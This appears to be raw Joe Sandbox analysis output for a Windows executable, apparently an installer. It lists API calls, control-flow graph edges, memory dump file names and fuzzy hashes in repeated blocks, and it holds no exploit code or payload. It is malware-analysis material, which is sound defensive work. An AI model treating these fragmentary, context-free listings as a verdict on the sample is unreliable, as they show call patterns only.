                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 697 423a94-423aa2 698 423b20-423b23 697->698 699 423aa4-423aa8 697->699 700 423aaa-423ac4 EnumWindows 699->700 701 423b1d 699->701 700->701 702 423ac6-423ae3 GetWindow GetWindowLongA 700->702 701->698 703 423ae5 702->703 704 423aec-423af6 702->704 703->704 704->701 705 423af8-423b1b call 40b44c SetWindowPos 704->705 705->701
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                                                                                                                                                                                                                                                                                                  • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$EnumLongWindows
                                                                                                                                                                                                                                                                                                                                                                  • String ID: lAB
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4191631535-3476862382
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 708 41f490-41f4be GetClassInfoA 709 41f4c0-41f4c8 708->709 710 41f4ca-41f4cc 708->710 709->710 711 41f4e9-41f52a call 406300 call 41f3d4 SetWindowLongA 709->711 712 41f4df-41f4e4 RegisterClassA 710->712 713 41f4ce-41f4da UnregisterClassA 710->713 712->711 713->712
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                                                                                                                                                                                                                                                                                                                  • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                                                                                                                                                                                                                                                                                                                  • RegisterClassA.USER32(00499598), ref: 0041F4E4
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4025006896-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                                                                                                                                                                                                                                                                                                  • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: A4620A480A570EnumFonts
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 178811091-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498586), ref: 0040334B
  • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498586), ref: 00403356
  • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
  • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
  • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
  • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
  • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
  • Part of subcall function 00409B88: 6F9E1CD0.COMCTL32(0049859A), ref: 00409B88
  • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
  • Part of subcall function 00419050: GetVersion.KERNEL32(004985AE), ref: 00419050
  • Part of subcall function 0044F754: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
  • Part of subcall function 0044F754: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
  • Part of subcall function 0044FBFC: GetVersionExA.KERNEL32(0049B790,004985C7), ref: 0044FC0B
  • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
  • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
  • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
  • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
  • Part of subcall function 00456EEC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
  • Part of subcall function 00464960: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
  • Part of subcall function 00464960: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
  • Part of subcall function 0046D098: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
  • Part of subcall function 00478B3C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
  • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
  • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
  • Part of subcall function 00495584: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049559D
• SetErrorMode.KERNEL32(00000001,00000000,0049863C), ref: 0049860E
  • Part of subcall function 00498338: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
  • Part of subcall function 00498338: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
  • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
  • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
• ShowWindow.USER32(?,00000005,00000000,0049863C), ref: 0049866F
  • Part of subcall function 00482050: SetActiveWindow.USER32(?), ref: 004820FE
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
• String ID: Setup
• API String ID: 504348408-3839654196
• Opcode ID: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
• Instruction ID: d131c851e578025af209eb9e9c2d0e6aaf1cfb04eb4cc82699b843ce611002a7
• Opcode Fuzzy Hash: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
• Instruction Fuzzy Hash: 5C31D4702046409ED601BBBBED5352E3B98EB8A718B61487FF804D6553CE3D6C148A3E
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00456E7C: CoInitialize.OLE32(00000000), ref: 00456E82
  • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
  • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
• GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: AddressErrorInitializeLibraryLoadModeProc
• String ID: SHCreateItemFromParsingName$shell32.dll
• API String ID: 2906209438-2320870614
• Opcode ID: d06851ab321b3541b358425e64ece92a9dd3680dc6d91b0b498189b82d1e29c2
• Instruction ID: 6d1f0b9ea2f83cf17b9d56af39d37ffc4890966232cc80b75afa5f9be50b51f8
• Opcode Fuzzy Hash: d06851ab321b3541b358425e64ece92a9dd3680dc6d91b0b498189b82d1e29c2
• Instruction Fuzzy Hash: 97C04CA1B4169096CB00B7FAA54361F2414DB5075FB96C07FBD40BB687CE7D8848AA2E
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
  • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
• GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorLibraryLoadModeProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2492108670-2683653824
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                                                                                                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 0042449F
                                                                                                                                                                                                                                                                                                                                                                  • DispatchMessageA.USER32(?), ref: 004244A9
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4217535847-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                                                                                                  • String ID: |2h
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2087232378-213120317
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0047EDE1,?,?,00000001,00000000), ref: 0047EC4A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • /SPAWNWND=$%x /NOTIFYWND=$%x , xrefs: 0047ECB5
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: Window
• String ID: /SPAWNWND=$%x /NOTIFYWND=$%x
• API String ID: 2353593579-560813925
• Opcode ID: ae61550f504763cf218c3e2ecc02052625be6b1c1a3f3a572833970bf44392c3
• Instruction ID: b5665820ffd1b45baca6a1f3cc7b68665085fe19fe65d74f16aceae6615345ff
• Opcode Fuzzy Hash: ae61550f504763cf218c3e2ecc02052625be6b1c1a3f3a572833970bf44392c3
• Instruction Fuzzy Hash: AA31A274A04349AFDB01CFA9C895EDEBFF8EB0D314F4184A6E504A7352D739A940CB69
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetACP.KERNEL32(?,?,00000001,00000000,0047E25F,?,-0000001A,004800D8,-00000010,?,00000004,0000001B,00000000,00480425,?,0045DECC), ref: 0047DFF6
  • Part of subcall function 0042E32C: 73E9A570.USER32(00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0042E33B
  • Part of subcall function 0042E32C: EnumFontsA.GDI32(?,00000000,0042E318,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
  • Part of subcall function 0042E32C: 73E9A480.USER32(00000000,?,0042E38B,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E37E
• SendNotifyMessageA.USER32(000D023E,00000496,00002711,-00000001), ref: 0047E1C6
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: A480A570EnumFontsMessageNotifySend
• String ID:
• API String ID: 2685184028-0
• Opcode ID: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
• Instruction ID: 0ea8e5e95b90053dcc80dc26f94e29a170662e2b3e10ca2db4d961c35622b213
• Opcode Fuzzy Hash: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
• Instruction Fuzzy Hash: 2651A6746001508BD710FF27D9C16963799EB88308B90C6BBA8089F367C77CDD068B9D
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,00401973), ref: 00401766
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: FreeVirtual
• String ID: |2h
• API String ID: 1263568516-213120317
• Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
• Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
• Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
• Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadCursorA.USER32(00000000,00007F00), ref: 00423259
• LoadCursorA.USER32(00000000,00000000), ref: 00423283
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: CursorLoad
• String ID:
• API String ID: 3238433803-0
• Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
• Instruction ID: c8375b04fab070422f53c3d6524130e38f027298e82d6ab835706982cf041ecc
• Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
• Instruction Fuzzy Hash: 0FF0A711704114AADA105D7E6CC0E2B7268DB91B36B6103BBFA3AD72D1C62E1D41457D
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLibraryLoadMode
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2987862817-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4c631be622775e629d3517db74bab1fded93a1e132453b83b18733572cca4853
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 98bcbcc3e9aaf4c66058534b39987ccdd7eb12bd14468eaf88ad72af9e5505e3
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c631be622775e629d3517db74bab1fded93a1e132453b83b18733572cca4853
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5F05E70A14744BEDF119F779C6282ABAACE749B1179248B6F810A3691E67D48108928
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1658689577-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2ab4847006ef9acfce6ccb5f1f64a91e8b74d27154e4f0e7901e4566ca639e1f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ea6634d2ed8774f5e90a5a6f355d63bed973dafba18e0ec7d48b30ffe24ea089
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ab4847006ef9acfce6ccb5f1f64a91e8b74d27154e4f0e7901e4566ca639e1f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4314375E001199BCF01DF95C8819EEB7B9FF84314F15857BE815AB286E738AE018B98
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507F0
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
